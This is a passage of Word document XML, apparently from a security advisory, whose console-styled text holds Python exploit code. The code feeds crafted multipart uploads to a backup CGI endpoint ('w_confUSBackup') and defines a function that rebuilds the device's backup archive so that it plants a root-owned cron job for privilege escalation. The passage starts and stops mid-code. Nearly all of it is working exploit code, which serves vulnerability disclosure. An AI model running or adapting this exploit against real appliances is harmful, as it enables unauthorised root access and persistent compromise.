            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>"</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4BAFABB6" w14:textId="77777777" w:rsidR="00D61684" w:rsidRDefault="00D61684" w:rsidP="00D61684">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">    </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>os.environ</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>["CONTENT_TYPE"] = "multipart/form-data; boundary=" + boundary1[2:]</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2D5B391D" w14:textId="77777777" w:rsidR="00D61684" w:rsidRDefault="00D61684" w:rsidP="00D61684">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="1FAAD8C4" w14:textId="77777777" w:rsidR="00D61684" w:rsidRDefault="00D61684" w:rsidP="00D61684">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">    </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>os.environ</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>["CONTENT_LENGTH"] = str(</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>len</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>(post_data1))</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="784A98C3" w14:textId="77777777" w:rsidR="00D61684" w:rsidRDefault="00D61684" w:rsidP="00D61684">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">    r = </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>subprocess.Popen</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>(</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="60D36E91" w14:textId="77777777" w:rsidR="00D61684" w:rsidRDefault="00D61684" w:rsidP="00D61684">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">        [CGI_BIN, "</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>utilserv</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>/</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>confUSBackup</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>/</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>w_confUSBackup</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>"],</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2A45A916" w14:textId="77777777" w:rsidR="00D61684" w:rsidRDefault="00D61684" w:rsidP="00D61684">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">        </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>stdout</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>=</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>subprocess.PIPE</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>,</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4D7486DC" w14:textId="77777777" w:rsidR="00D61684" w:rsidRDefault="00D61684" w:rsidP="00D61684">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">        stderr=</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>subprocess.STDOUT</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>,</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0A6685E9" w14:textId="77777777" w:rsidR="00D61684" w:rsidRDefault="00D61684" w:rsidP="00D61684">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">        stdin=</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>subprocess.PIPE</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>,</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1A2BE2E9" w14:textId="77777777" w:rsidR="00D61684" w:rsidRDefault="00D61684" w:rsidP="00D61684">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">    )</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="20ACBF04" w14:textId="77777777" w:rsidR="00D61684" w:rsidRDefault="00D61684" w:rsidP="00D61684">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">    </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>r.stdin</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>.write</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>(post_data1)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1E28C30A" w14:textId="77777777" w:rsidR="00D61684" w:rsidRDefault="00D61684" w:rsidP="00D61684">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">    </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>r.stdin</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>.close</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>()</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1CCF0E28" w14:textId="77777777" w:rsidR="00D61684" w:rsidRDefault="00D61684" w:rsidP="00D61684">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="4E5EDEDC" w14:textId="77777777" w:rsidR="00D61684" w:rsidRDefault="00D61684" w:rsidP="00D61684">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">    </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>os.environ</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>["CONTENT_TYPE"] = "multipart/form-data; boundary=" + boundary2[2:]</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="28987EF5" w14:textId="77777777" w:rsidR="00D61684" w:rsidRDefault="00D61684" w:rsidP="00D61684">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">    </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>os.environ</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>["CONTENT_LENGTH"] = str(</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>len</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>(post_data2))</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7D4B3918" w14:textId="77777777" w:rsidR="00D61684" w:rsidRDefault="00D61684" w:rsidP="00D61684">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">    r = </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>subprocess.Popen</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>(</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="49DA417C" w14:textId="77777777" w:rsidR="00D61684" w:rsidRDefault="00D61684" w:rsidP="00D61684">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">        [CGI_BIN, "</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>utilserv</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>/</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>confUSBackup</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>/</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>w_confUSBackup</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>"],</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="550EFDF3" w14:textId="77777777" w:rsidR="00D61684" w:rsidRDefault="00D61684" w:rsidP="00D61684">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">        </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>stdout</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>=</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>subprocess.PIPE</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>,</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3B312D31" w14:textId="77777777" w:rsidR="00D61684" w:rsidRDefault="00D61684" w:rsidP="00D61684">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">        stderr=</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>subprocess.STDOUT</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>,</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="689F8970" w14:textId="77777777" w:rsidR="00D61684" w:rsidRDefault="00D61684" w:rsidP="00D61684">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">        stdin=</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>subprocess.PIPE</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>,</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4B688952" w14:textId="77777777" w:rsidR="00D61684" w:rsidRDefault="00D61684" w:rsidP="00D61684">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">    )</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0468DD65" w14:textId="77777777" w:rsidR="00D61684" w:rsidRDefault="00D61684" w:rsidP="00D61684">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">    </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>r.stdin</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>.write</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>(post_data2)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="46020D8F" w14:textId="77777777" w:rsidR="00D61684" w:rsidRDefault="00D61684" w:rsidP="00D61684">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">    </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>r.stdin</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>.close</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>()</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="57CF04AF" w14:textId="77777777" w:rsidR="00D61684" w:rsidRDefault="00D61684" w:rsidP="00D61684">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="3BF39055" w14:textId="77777777" w:rsidR="00D61684" w:rsidRDefault="00D61684" w:rsidP="00D61684">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">    return </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>re.findall</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>(r"/</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>tmp</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>/(.*?\.tar\.</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>gz</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve">)", </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>r.stdout.read</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>())[0]</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="09F4CFCB" w14:textId="77777777" w:rsidR="00D61684" w:rsidRDefault="00D61684" w:rsidP="00D61684">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="0FD45A18" w14:textId="77777777" w:rsidR="00D61684" w:rsidRDefault="00D61684" w:rsidP="00D61684">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="6090F8CC" w14:textId="77777777" w:rsidR="00D61684" w:rsidRDefault="00D61684" w:rsidP="00D61684">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">def </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>create_malicious_backup</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>(</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>backup_path</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>):</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="34A59F26" w14:textId="77777777" w:rsidR="00D61684" w:rsidRDefault="00D61684" w:rsidP="00D61684">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">    """</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="50D74401" w14:textId="77777777" w:rsidR="00D61684" w:rsidRDefault="00D61684" w:rsidP="00D61684">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">    Handles modification of backup, and payload dropping</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6D58B3FA" w14:textId="77777777" w:rsidR="00D61684" w:rsidRDefault="00D61684" w:rsidP="00D61684">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">    </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7EFD60F2" w14:textId="77777777" w:rsidR="00D61684" w:rsidRDefault="00D61684" w:rsidP="00D61684">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:lastRenderedPageBreak/>
              <w:t xml:space="preserve">    To prevent the need to pull the tar to a system where we have root so we can preserve all file ownership</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="597D301B" w14:textId="77777777" w:rsidR="00D61684" w:rsidRDefault="00D61684" w:rsidP="00D61684">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">    We instead just replace util_backup.tar.gz with an archive containing our malicious </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>cron</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve"> job as the only file.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="32AB4FF4" w14:textId="77777777" w:rsidR="00D61684" w:rsidRDefault="00D61684" w:rsidP="00D61684">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">    This should work (at least own the two versions we have tested) as the only backup sanity checking seems to </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="71271CCD" w14:textId="37DE4913" w:rsidR="00D61684" w:rsidRDefault="00D61684" w:rsidP="00D61684">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">    consist of ensuring that unexpected files are not uploaded, and that the database backups exist and are valid.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7C422938" w14:textId="77777777" w:rsidR="00541791" w:rsidRDefault="00541791" w:rsidP="00541791">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="65A64035" w14:textId="11345384" w:rsidR="00541791" w:rsidRDefault="00541791" w:rsidP="00541791">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">    Both archives must have a root folder of "."</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0488EA86" w14:textId="77777777" w:rsidR="00D61684" w:rsidRDefault="00D61684" w:rsidP="00D61684">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">    """</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1399C883" w14:textId="77777777" w:rsidR="00D61684" w:rsidRDefault="00D61684" w:rsidP="00D61684">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="0DADF50D" w14:textId="77777777" w:rsidR="00D61684" w:rsidRDefault="00D61684" w:rsidP="00D61684">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">    </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>pre_commands</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve"> = [</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="659EB4AF" w14:textId="77777777" w:rsidR="00D61684" w:rsidRDefault="00D61684" w:rsidP="00D61684">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">        ["</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>mkdir</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>", "-p", "/</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>tmp</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>/</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>poc</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>/</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>util_backup</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>/</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>etc</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>/</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>cron.d</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>"],</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="148689EC" w14:textId="77777777" w:rsidR="00D61684" w:rsidRDefault="00D61684" w:rsidP="00D61684">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">        ["tar", "-</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>xpzf</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve">", </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>backup_path</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>, "--force-local", "-C", "/</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>tmp</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>/</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>poc</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>/"],</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0865EF3D" w14:textId="77777777" w:rsidR="00D61684" w:rsidRDefault="00D61684" w:rsidP="00D61684">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">        ["rm", "-f", "/</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>tmp</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>/</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>poc</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>/util_backup.tar.gz"],</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4997BC18" w14:textId="77777777" w:rsidR="00D61684" w:rsidRDefault="00D61684" w:rsidP="00D61684">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">    ]</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5D17C2C1" w14:textId="77777777" w:rsidR="00D61684" w:rsidRDefault="00D61684" w:rsidP="00D61684">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="73973E60" w14:textId="77777777" w:rsidR="00D61684" w:rsidRDefault="00D61684" w:rsidP="00D61684">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">    </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>post_commands</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve"> = [</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0C40E808" w14:textId="77777777" w:rsidR="00D61684" w:rsidRDefault="00D61684" w:rsidP="00D61684">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">        ["</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>chmod</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>", "644", "/</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>tmp</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>/</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>poc</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>/</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>util_backup</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>/</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>etc</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>/</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>cron.d</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>/</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>poc</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>"],</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="311237D3" w14:textId="77777777" w:rsidR="00D61684" w:rsidRDefault="00D61684" w:rsidP="00D61684">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">        [</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="22F466FB" w14:textId="77777777" w:rsidR="00D61684" w:rsidRDefault="00D61684" w:rsidP="00D61684">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">            "tar",</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="151F700C" w14:textId="77777777" w:rsidR="00D61684" w:rsidRDefault="00D61684" w:rsidP="00D61684">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">            "-</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>cpzf</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>",</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="721A2D0F" w14:textId="77777777" w:rsidR="00D61684" w:rsidRDefault="00D61684" w:rsidP="00D61684">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">            "/</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>tmp</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>/</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>poc</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>/util_backup.tar.gz",</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="713F9B32" w14:textId="77777777" w:rsidR="00D61684" w:rsidRDefault="00D61684" w:rsidP="00D61684">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">            "-C",</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3031CC05" w14:textId="77777777" w:rsidR="00D61684" w:rsidRDefault="00D61684" w:rsidP="00D61684">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">            "/</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>tmp</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>/</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>poc</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>/</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>util_backup</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>",</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="016CA33A" w14:textId="77777777" w:rsidR="00D61684" w:rsidRDefault="00D61684" w:rsidP="00D61684">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">            "--owner=0",</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3FBE9F85" w14:textId="77777777" w:rsidR="00D61684" w:rsidRDefault="00D61684" w:rsidP="00D61684">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">            "--group=0",</w:t>
            </w:r>
          </w:p>
